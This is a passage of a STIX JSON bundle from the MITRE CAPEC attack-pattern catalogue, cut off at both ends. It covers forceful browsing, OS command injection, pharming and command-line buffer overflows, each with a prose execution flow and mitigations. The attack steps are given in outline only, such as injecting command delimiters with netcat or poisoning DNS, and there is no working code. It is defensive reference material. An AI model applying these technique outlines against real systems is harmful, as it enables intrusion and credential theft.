{ + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--43bfa851-97cf-48ba-8050-69a14ce4b820", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e5a1a01-0c47-4cc1-9ce2-6156b3d231b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b609b9c-0b10-497b-b953-c1d279689017", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d72764d4-b17e-42fe-81ba-463f07deb30f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4e7dfa2a-7e3f-483c-bd32-1110f0cbfb03", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c80de0f3-14b1-4da8-ab8f-01d6e8887f58", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77b4da2d-507c-490d-8270-6c9c321c6752", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", + "external_references": [ + { + "external_id": "CAPEC-87", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/87.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Predictable Resource Location", + "external_id": "34", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Predictable-Resource-Location" + }, + { + "description": "Forced browsing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Forced_browsing" + } + ], + "id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Forceful Browsing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A bulletin board application 
provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.

  2. Techniques
    Use a spidering tool to follow and record all links.
    Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

  1. Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.

  2. Techniques
    Use a spidering tool to follow and record attempts on well-known URLs.
    Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

  1. Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.

  2. Techniques
    Access unprotected functions and execute them.
  3. View unauthorized data: The attacker discovers and views unprotected sensitive data.

  4. Techniques
    Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.", + "id": "course-of-action--8b71c095-ad74-4c7c-9670-929e14eb0110", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-87-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c3b65115-d4f0-4a7d-a9d8-7c012f7e3787", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8b71c095-ad74-4c7c-9670-929e14eb0110", + "target_ref": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Forceful browsing can also be made difficult to a large extent by not hard-coding 
names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context.", + "id": "course-of-action--94eb039d-4dcb-40b2-bf6f-e98fe456747c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-87-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6172678d-c4c1-4700-9518-deec24ab23cc", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94eb039d-4dcb-40b2-bf6f-e98fe456747c", + "target_ref": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. 
An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.", + "external_references": [ + { + "external_id": "CAPEC-88", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "OS Commanding", + "external_id": "31", + "source_name": "WASC", + "url": "http://projects.webappsec.org/OS-Commanding" + }, + { + "description": "Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection, Secunia Advisories, 2005--09---20, Secunia", + "external_id": "REF-543", + "source_name": "reference_from_CAPEC", + "url": "http://secunia.com/advisories/16869/" + } + ], + "id": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "OS Command Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism", + "Read 
Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.\n An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data.See also: A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify inputs for OS commands: The attacker determines user controllable input that gets passed as part of a command to the underlying operating system.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user

  4. Techniques
    Spidering web sites for all available links
    Inventory all application inputs

Experiment

  1. Vary inputs, looking for malicious results.: Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application

  2. Techniques
    Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
    Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)

Exploit

  1. Execute malicious commands: The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way.

  2. Techniques
    The attacker executes a command that stores sensitive information into a location where they can retrieve it later (perhaps using a different command injection).
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User controllable input used as part of commands to the underlying operating system." + ], + "x_capec_skills_required": { + "High": "The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.", + "id": "course-of-action--ca12abfd-929e-4a4d-9bc0-c87d1daf98db", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9de3eaad-1ea7-4658-a9af-71b7e6a839d3", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca12abfd-929e-4a4d-9bc0-c87d1daf98db", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating 
system or shell commands", + "id": "course-of-action--23d88ce3-abfc-4664-b193-3c5a020033f6", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--318ffd75-623d-4e4e-82ef-fe62b9837bef", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--23d88ce3-abfc-4664-b193-3c5a020033f6", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All application processes should be run with the minimal privileges required. 
Also, processes must shed privileges as soon as they no longer require them.", + "id": "course-of-action--9edf924d-3f02-40cd-81ef-fd883a496feb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22a2ec23-338d-4ecf-ac2b-3692d8dd907d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9edf924d-3f02-40cd-81ef-fd883a496feb", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. 
Pharming does not require script injection or clicking on malicious links for the attack to succeed.", + "external_references": [ + { + "external_id": "CAPEC-89", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + } + ], + "id": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Pharming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.\n An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Exploit

  1. Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information.

  2. The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website

  3. When the victim requests the URL for the site, the poisoned records direct the victim to the attackers' system rather than the original one.

  4. Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now \"farm\" sensitive information such as credentials or account numbers.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Vulnerable DNS software or improperly protected hosts file or router that can be poisoned", + "A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Having knowledge of the way the target site has been structured, in order to create a fake version, is required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All sensitive information must be handled over a secure connection.", + "id": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a29576b-049b-4956-8b53-ce4e9053139a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "target_ref": 
"attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.", + "id": "course-of-action--ca76ad8b-bd0c-4eec-a930-535476f450af", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7002b548-99da-4471-becf-a12babe27aaa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca76ad8b-bd0c-4eec-a930-535476f450af", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority.", + "id": "course-of-action--26275ac3-7197-403e-90e8-58d6459057cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--847a5a83-ab42-40dc-b158-f71498aa91cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26275ac3-7197-403e-90e8-58d6459057cb", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets command-line utilities available in a number of shells. An adversary can leverage a vulnerability found in a command-line utility to escalate privilege to root.", + "external_references": [ + { + "external_id": "CAPEC-9", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/9.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow in Local Command-Line Utilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n \n Attack Example: HPUX passwd\n A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option.\n \n \n Attack Example: Solaris getopt\n A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0].\n \n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target system: The adversary first finds a target system that they want to gain elevated priveleges on. This could be a system they already have some level of access to or a system that they will gain unauthorized access at a lower privelege using some other means.

  2. Find injection vector: The adversary identifies command line utilities exposed by the target host that contain buffer overflow vulnerabilites. The adversary likely knows which utilities have these vulnerabilities and what the effected versions are, so they will also obtain version numbers for these utilities.

Experiment

  1. Craft overflow command: Once the adversary has found a vulnerable utility, they will use their knownledge of the vulnerabilty to create the command that will exploit the buffer overflow.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary executes the crafted command, gaining elevated priveleges on the machine.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes a command-line utility to the user.", + "The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.", + "id": "course-of-action--eb3c859f-41ee-430e-8803-f17c655faf17", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13bbe611-6800-4010-ae1b-33b6e818ee74", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb3c859f-41ee-430e-8803-f17c655faf17", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
